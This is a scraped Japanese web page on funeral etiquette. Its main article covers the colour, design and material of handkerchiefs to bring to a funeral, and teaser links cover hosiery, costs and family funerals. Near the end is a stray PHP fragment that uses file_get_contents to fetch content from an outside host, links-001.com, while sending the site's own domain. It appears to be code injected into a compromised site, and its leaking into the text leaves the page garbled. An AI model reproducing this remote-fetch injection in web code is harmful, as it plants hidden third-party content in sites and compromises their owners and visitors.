前へ
次へ

葬式における女性のストッキングや男性の靴下のマナー

葬式に参列する際には、女性であればストッキング、男性であれば靴下にもマナーがあるため、十分に注意する

more

葬式代はある程度準備しておくのが最適です

家族葬や直葬の登場で葬儀費用も50万円程度あれば済ませられる時代になりましたが、基本一括支払いになる

more

家族葬を行なうメリットを知っておく

広く告知をして一般の参列者にまで足を運んでもらう、一般葬よりも親族のみで執り行なう家族葬を選択する人

more

葬式に持っていくハンカチにもマナーがある

葬式に着用する喪服などにもマナーがあるように、葬式でのハンカチにもマナーがあるとされています。
葬式に持っていくハンカチは、白色か黒色にものにするのがマナーです。
本来は白色のハンカチを持つことが基本とされていましたが、最近では黒色の喪服に合わせて黒色のハンカチを持つことも一般的になっています。
それに対して、葬式には絶対持っていくべきでない色もあるため注意が必要です。
派手な色はマナー違反となると同時に、赤色やピンク、緑色といった原色のハンカチもマナー違反と見なされます。
葬式に持っていくハンカチのデザインに関しては、無地が基本ですが、控えめな刺繍やレースは問題ないと言われています。
もちろん、ラメが入ったものなど光るものはマナーに反するということを覚えておきましょう。
ハンカチの素材に関して特別なマナーはないものの、勧められているのは綿や麻、またポリエステルなどです。
フォーマルな場にふさわしいシルクはやや光沢があるため、葬式には適さないと考える人も多くなっています。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top